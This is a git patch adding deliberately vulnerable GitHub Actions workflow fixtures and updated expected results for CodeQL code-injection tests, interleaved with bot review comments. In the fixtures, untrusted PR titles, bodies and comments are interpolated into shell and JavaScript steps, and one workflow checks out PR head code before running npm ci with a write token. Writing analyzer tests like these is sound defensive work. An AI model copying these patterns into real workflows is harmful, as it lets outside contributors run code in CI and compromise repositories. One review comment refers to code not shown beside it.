ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-4.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml b/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml index 13c246f4ff37..a03c27be226b 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml @@ -9,6 +9,9 @@ outputs: result: description: "result" value: ${{ steps.step.outputs.result }} + result2: + description: "result" + value: ${{ steps.step2.outputs.result2 }} runs: using: 'composite' steps: 
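Review bot: The two `exists(... w | w.getOutputs() = outputs)` / `exists(... a | a.getOutputs() = outputs)` clauses each bind a variable that is used only once, which is what `any(...)` is for; the original single-line form generalizes directly as `outputs = any(ReusableWorkflow w).getOutputs() or outputs = any(CompositeAction a).getOutputs()`, keeping the predicate to two lines. Since `ReturnNode` now also covers composite-action outputs, the class-level doc comment, which sits above this hunk and is not visible here, should be checked so it no longer describes the node as reusable-workflow-only. The rest of `ReturnNode` (e.g. `getKind()`) is unchanged and continues past the hunk.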
@@ -20,6 +23,11 @@ runs: FOO: ${{ inputs.taint }} shell: bash run: echo "result=$(echo $FOO)" >> $GITHUB_OUTPUT + - id: step2 + env: + FOO2: ${{ github.event.pull_request.body }} + shell: bash + run: echo "result2=$(echo $FOO2)" >> $GITHUB_OUTPUT - name: Sink id: sink shell: bash diff --git a/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml b/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml new file mode 100644 index 000000000000..75d7e79c1e45 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml @@ -0,0 +1,46 @@ +name: Clone repository +description: Clone repository +inputs: + title: + description: Title + required: true + forked-pr: + description: Whether the event is operating from a forked PR + required: true + fetch-depth: + description: Fetch depth for actions/checkout + default: "1" +outputs: + result: + description: "result" + value: ${{ steps.out.outputs.replaced }} + +runs: + using: composite + steps: + - shell: bash + run: echo "${{ inputs.title }}" + - uses: frabert/replace-string-action@v2.5 + id: out + with: + pattern: "\"" + string: ${{ inputs.title }} + replace-with: 'foo' + flags: g + - id: out2 + env: + FOO: ${{ inputs.title }} + shell: bash + run: echo "result=$(echo $FOO)" >> $GITHUB_OUTPUT + - name: Clone branch + if: "!fromJSON(inputs.forked-pr)" + uses: actions/checkout@v3 + with: + fetch-depth: ${{ inputs.fetch-depth }} + - name: Clone forked PR + if: fromJSON(inputs.forked-pr) + uses: actions/checkout@v3 + with: + ref: refs/pull/${{ github.event.number }}/merge + fetch-depth: ${{ inputs.fetch-depth }} + 
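Review bot: The new `clone-repo/action.yaml` fixture lets `inputs.title` reach three different places (`run: echo "${{ inputs.title }}"`, the `string:` input of `frabert/replace-string-action`, and the `FOO` env of step `out2`), but nothing in the file says which of them are intended positives, so a future cleanup could "fix" one and silently shrink the expected results. Suggest a leading comment such as `# Test fixture: inputs.title is attacker-controlled via composite-action-caller-4.yml; the run step echoing it directly is the intended code-injection sink, and outputs.result is tainted through the replace-string step.` Step `out2` writes `result=` to `$GITHUB_OUTPUT` but the declared output reads `steps.out.outputs.replaced`, so `out2` is dead for this test and worth either removing or commenting as deliberate noise. Likewise, `actions/checkout@v3` with `ref: refs/pull/${{ github.event.number }}/merge` is unrelated to the CWE-094 path being tested; a `# not a sink for this test` note would avoid confusion when other queries' expectations (e.g. unpinned-tag) pick it up.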
diff --git a/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml b/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml new file mode 100644 index 000000000000..0c4aa93c7a58 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml 
@@ -0,0 +1,95 @@ +name: changelog + +on: + workflow_call: + inputs: + taint: + description: taint + type: string + required: true + default: "" + +jobs: + changelog: + runs-on: ubuntu-latest + env: + file: CHANGELOG.md + steps: + - uses: actions/checkout@v3 + with: + fetch-depth: 0 + - name: Check ${{ env.file }} + run: | + if [[ $(git diff --name-only origin/master HEAD -- ${{ env.file }} | grep '^${{ env.file }}$' -c) -eq 0 ]]; then + echo "Expected '${{ env.file }}' to be modified" + exit 1 + fi + update: + runs-on: ubuntu-latest + needs: changelog + continue-on-error: true + env: + file: CHANGELOG.md + next_version: next + link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' + steps: + - run: echo "${{ inputs.taint }}" + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + - name: Update ${{ env.file }} from PR title + id: update + uses: actions/github-script@v6 + env: + log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' + prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' + with: + result-encoding: string + script: | + const fs = require('fs'); + const file = './${{ env.file }}'; + let content = fs.readFileSync(file).toString(); + const title = '[${{ env.next_version }}]'; + const log = '${{ env.log }}'; + let exists = ${{ needs.changelog.result == 'success' }}; + + if (!content.includes(title)) { + const insertAt = content.indexOf('\n') + 1; + content = + content.slice(0, insertAt) + + `\n## ${title}\n\n\n` + + content.slice(insertAt); + } + + const insertAt = content.indexOf('\n', content.indexOf(title) + title.length + 1) + 1; + if (exists && ${{ github.event.action == 'edited' }}) { + const prevLog = '${{ env.prev_log }}'; + const index = content.indexOf(prevLog, insertAt); + if (index > -1) { + content = content.slice(0, index) + content.slice(index + prevLog.length); + exists = false; + } + } + + if (!exists) { + content = 
content.slice(0, insertAt) + log + content.slice(insertAt); + fs.writeFileSync(file, content); + return true; + } + + return false; + - name: Setup node + if: fromJson(steps.update.outputs.result) + uses: actions/setup-node@v3 + with: + node-version: 18.x + - name: Commit & Push + if: fromJson(steps.update.outputs.result) + run: | + npm ci + npx prettier --write ${{ env.file }} + git config user.name github-actions[bot] + git config user.email github-actions[bot]@users.noreply.github.com + git add ${{ env.file }} + git commit -m "update ${{ env.file }}" + git push diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml index 231cddd0b882..62ad9ba779ce 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml @@ -11,4 +11,5 @@ jobs: with: taint: ${{ github.event.comment.body }} - run: echo "${{ steps.foo.outputs.result }}" + - run: echo "${{ steps.foo.outputs.result2 }}" diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-4.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-4.yml new file mode 100644 index 000000000000..e65660127326 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-4.yml @@ -0,0 +1,18 @@ + +name: Issue Workflow +on: + pull_request_target: +jobs: + test: + name: Test + runs-on: ubuntu-latest + steps: + - name: Clone branch + id: clone + uses: TestOrg/TestRepo/.github/actions/clone-repo@main + with: + title: ${{ github.event.pull_request.title }} + forked-pr: true + fetch-depth: 2 + - run: echo "${{ steps.clone.outputs.result }}" + 
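Review bot: In the new `reusable-workflow.yml` fixture the only sink the expected results record is `const log = '${{ env.log }}';` inside the `github-script` block, where the PR title is spliced into a JavaScript string literal, yet the `update` job also checks out `ref: ${{ github.event.pull_request.head.ref }}` and then runs `npm ci` and `git push` with the default token. When this workflow is invoked from `reusable-workflow-caller-3.yml` on `pull_request_target`, that is a second, independent problem (attacker-controlled `package.json` scripts executing with a write-capable token), so either mark it as out of scope for this test with a comment or make sure the untrusted-checkout query's expected output was regenerated alongside `CodeInjectionCritical.expected`. A short header, e.g. `# Test fixture: inputs.taint and env.log (PR title) are the intended code-injection sinks; the head.ref checkout + npm ci is not exercised by CWE-094`, would make the intent explicit. Minor: `inputs.taint` declares both `required: true` and `default: ""`, which are contradictory for a `workflow_call` input; dropping the default keeps the fixture realistic.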
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml new file mode 100644 index 000000000000..39dfafcf023e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml @@ -0,0 +1,10 @@ +name: Caller + +on: + pull_request_target: + +jobs: + test: + uses: TestOrg/TestRepo/.github/workflows/reusable-workflow.yml@main + with: + taint: ${{ github.event.pull_request.title }} From f095622a9bfde15828e876e23194a774c0b93686 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 21:50:59 +0200 Subject: [PATCH 533/707] Update expected test results --- .../CWE-020/ReusableWorkflowsSinks.expected | 16 +++++ .../CWE-094/CodeInjectionCritical.expected | 66 +++++++++++++++++-- .../CWE-094/CodeInjectionMedium.expected | 56 +++++++++++++++- .../CWE-829/UnpinnedActionsTag.expected | 4 +- 4 files changed, 132 insertions(+), 10 deletions(-) diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected index f2178960774e..18e9f0186dfd 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected 
@@ -1,7 +1,23 @@ edges +| .github/workflows/calling_workflow.yml:12:5:15:2 | Job: call2 [workflow-output1] | .github/workflows/calling_workflow.yml:35:20:35:62 | needs.call2.outputs.workflow-output1 | provenance | | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | provenance | | | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | provenance | | +| .github/workflows/reusable_workflow.yml:10:7:14:4 | output Job outputs node [workflow-output1] | .github/workflows/calling_workflow.yml:12:5:15:2 | Job: call2 [workflow-output1] | provenance | | +| .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | .github/workflows/reusable_workflow.yml:10:7:14:4 | output Job outputs node [workflow-output1] | provenance | | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | provenance | | +| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | provenance | | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | provenance | | +| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | provenance | | nodes +| .github/workflows/calling_workflow.yml:12:5:15:2 | Job: call2 [workflow-output1] | semmle.label | Job: call2 [workflow-output1] | +| .github/workflows/calling_workflow.yml:35:20:35:62 | needs.call2.outputs.workflow-output1 | semmle.label | needs.call2.outputs.workflow-output1 | | 
.github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | +| .github/workflows/reusable_workflow.yml:10:7:14:4 | output Job outputs node [workflow-output1] | semmle.label | output Job outputs node [workflow-output1] | +| .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | semmle.label | jobs.job1.outputs.job-output1 | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | semmle.label | Job outputs node [job-output1] | +| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | semmle.label | steps.step1.outputs.step-output | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | semmle.label | Run Step: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | semmle.label | inputs.config-path | | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | semmle.label | inputs.config-path | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 818b106b6d77..749d05244153 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
@@ -1,5 +1,20 @@ edges -| .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | provenance | | +| .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | provenance | | +| .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | provenance | | +| .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result2] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result2] | provenance | | +| .github/actions/action5/action.yml:11:13:11:44 | steps.step.outputs.result | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | provenance | | +| .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result2] | provenance | | +| .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | .github/actions/action5/action.yml:11:13:11:44 | steps.step.outputs.result | provenance | | +| .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | provenance | | +| .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | provenance | | +| .github/actions/action5/action.yml:28:16:28:52 | github.event.pull_request.body | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input 
title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | provenance | | 
@@ -30,7 +45,13 @@ edges | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | provenance | | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | provenance | | | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | provenance | | +| .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result2] | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | provenance | | +| .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | provenance | | | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | provenance | | +| .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | provenance | | +| .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | provenance | | +| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | provenance | | +| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | provenance | | | 
.github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | provenance | | @@ -72,6 +93,7 @@ edges | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | provenance | | | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | provenance | | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | provenance | | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | provenance | | 
@@ -129,8 +151,26 @@ nodes | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/actions/action5/action.yml:4:3:4:7 | input taint | semmle.label | input taint | -| .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | -| .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | semmle.label | inputs.taint | +| .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result2] | semmle.label | output Job outputs node [result2] | +| .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | semmle.label | output Job outputs node [result] | +| .github/actions/action5/action.yml:11:13:11:44 | steps.step.outputs.result | semmle.label | steps.step.outputs.result | +| .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | semmle.label | steps.step2.outputs.result2 | +| .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | semmle.label | Run Step: step [result] | +| .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | semmle.label | inputs.taint | +| .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | semmle.label | Run Step: step2 [result2] | +| .github/actions/action5/action.yml:28:16:28:52 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | semmle.label | inputs.taint | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | semmle.label | input title | +| 
.github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | semmle.label | output Job outputs node [result] | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | semmle.label | steps.out.outputs.replaced | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | semmle.label | inputs.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | semmle.label | Uses Step: out [replaced] | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | semmle.label | inputs.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | semmle.label | env.log | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | 
@@ -183,7 +223,14 @@ nodes | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result2] | semmle.label | Uses Step: foo [result2] | +| .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | semmle.label | Uses Step: foo [result] | | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | semmle.label | steps.foo.outputs.result | +| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | semmle.label | steps.foo.outputs.result2 | +| .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | semmle.label | Uses Step: clone [result] | +| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | semmle.label | steps.clone.outputs.result | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | semmle.label | github.event.commits[0].message | | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | 
@@ -289,6 +336,7 @@ nodes | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | 
@@ -387,10 +435,15 @@ nodes | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | subpaths +| .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | +| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | #select | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | ${{ inputs.taint }} | +| .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | ${{ inputs.taint }} | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user. 
